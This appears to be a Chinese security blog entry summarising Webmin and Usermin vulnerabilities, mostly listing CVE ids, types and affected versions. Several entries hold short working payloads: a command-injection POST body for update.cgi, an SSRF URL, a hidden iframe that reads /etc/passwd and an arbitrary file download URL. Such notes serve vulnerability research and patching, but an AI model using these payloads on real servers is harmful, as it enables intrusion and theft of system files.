简介

开发语言

PHP

用途
系统管理

CVE-2019-15642

Date
2019.7

类型
远程代码执行

影响范围
Webmin <= 1.920

复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";

分析

反序列化导致远程代码执行

CVE-2019-15107

Date



类型

远程代码执行

影响范围

Webmin <= 1.920

前置条件
/password_change.cgi可访问

复现
POC | EXP


分析

CVE-2019-12840

Date

2019.6

类型

远程代码执行

影响范围

v 1.910

复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi 
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi 
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages


分析

XSS vulnerability that leads to Remote Code Execution

Date



类型

XSS导致远程代码执行

影响范围

Webmin version 1.850

前置条件
/at/create_job.cgi可访问
 

CSRF

Date



类型

CSRF

影响范围

Webmin version 1.850

SSRF

Date



类型

SSRF

影响范围

Webmin version 1.850

复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com

HTML Email Command Execution Vulnerability

Date

类型

远程命令执行



影响范围
Usermin versions <= 1.080


复现

POC|EXP

<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv

ictim&history=' height=0 width=0></iframe>

任意文件下载

Date



类型

任意文件下载

影响范围

DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0

前置条件

/dansguardian/edit.cgi 可访问

复现

POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]

应用安全 - 工具 | 平台 -webmin - 漏洞 - 汇总的更多相关文章

  1. 应用安全 - 工具 | 平台 - Weblogic - 漏洞 - 汇总

    控制台路径 | 弱口令  前置条件 /console CVE-2016-0638  Date 类型远程代码执行 影响范围10.3.6, 12.1.2, 12.1.3, 12.2.1  CVE-2016 ...

  2. 应用安全 - 工具 | 平台 - gitlist - 漏洞 - 汇总

    简介 用途 Github仓库查看器 CVE-2014-4511 Date 类型 远程代码执行 影响范围 gitlist 0.4.0及之前版本

  3. 应用安全 - 平台 | 工具 - Centreon Web - 漏洞 - 汇总

    简介 产地 法国 用途 监控 分布 CVE-2019-16405 https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html

  4. 应用安全 - 工具 | 数据库 - redis - 漏洞 - 汇总

    未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析

  5. 应用安全 - 软件漏洞 - 可视化平台kibana漏洞汇总

    CVE-2019-7609  Date: 类型: RCE 前置条件: Timelion And Canvas 影响范围: kibana-RCE < PoC | ExP: https://gith ...

  6. ETH&EOS开发资源及工具集合(完整汇总版)

    ETH&EOS开发资源及工具集合(完整汇总版) 3113 ETH开发资源篇 一.开发语言 ·         Solidity - 官方推荐以太坊智能合约开发语言,也是目前最为主流的智能合约语 ...

  7. Android开发之《常用工具及文档汇总》

    GreenVPN:https://www.getgreenjsq.com/ Android开发工具.资料下载汇总:http://androiddevtools.cn/#img-size-handle- ...

  8. 【转】使用kettle工具遇到的问题汇总及解决方案

    使用kettle工具遇到的问题汇总及解决方案   转载文章版权声明:本文转载,原作者薄海 ,原文网址链接 http://blog.csdn.net/bohai0409/article/details/ ...

  9. 【架构】技术-工具-平台-语言&框架

    技术-工具-平台-语言&框架 Techniques | Technology Radar | ThoughtWorks

随机推荐

  1. Linux下Discuz!7.2 LAMP环境搭建

    linux下Discuz LAMP环境搭建 1.需要的源代码 httpd-2.2.15.tar.gz          mysql-5.1.44.tar.gz     php-5.3.2.tar.gz ...

  2. nginx防止跳转到内网解决

    proxy_redirect http://test.abc.com:9080/ /;

  3. 一个原生ajax在jetbrains开发平台的调用方法

    这段随笔的记述目的无非是,一个html页面中可能有多段js代码,所以采用外引的方法应该会好一些 function checkfiles() { var xhr = new XMLHttpRequest ...

  4. grunt-contrib-concat 合并任意文件

    grunt-contrib-concat可用于合并任意文件(css\js\txt等) 安装插件:npm install grunt-contrib-concat --save-dev 参数: sepa ...

  5. 【C#-读取XML文件】XMLReader读取XML文档

    使用   XmlReader.Create("文件路径")   加载xml文件 XmlReader使用流的方式来读取. //使用XMLReader读取XML数据 XmlReader ...

  6. 自定义 Swiper 的上一页,下一页按钮

    1. Swiper 的上一页,下一页按钮,不是必需包含在container 中的 2. 定义上一页,下一页按钮的样式,CSS略.... 3. 在初始化Swiper中,定义上一页,下一页按钮

  7. vs 2019 调试web项目 浏览器

  8. JDK、JRE和JVM的区别与相互之间的联系

    工作这么久,好多时间都在研究一些并发.多线程.分布式.框架等这些东西,但是前几天突然被人问到jdk.jre.jvm的区别与联系,瞬间觉得一脸懵逼,感觉还是有必要重新整理一下一些比较基本的java知识了 ...

  9. C++:std::map的遍历

    for (auto &kv : myMap) { count<<kv.first<<" has value "<<kv.second&l ...

  10. 如何在IntelliJ Idea中同时启动不同端口

    配置多实例: 选择Idea右上角启动按钮边上的Edit Configurations,在打开的对话框中,去掉Single Instance Only的选项,VM Options中增加-Dserver. ...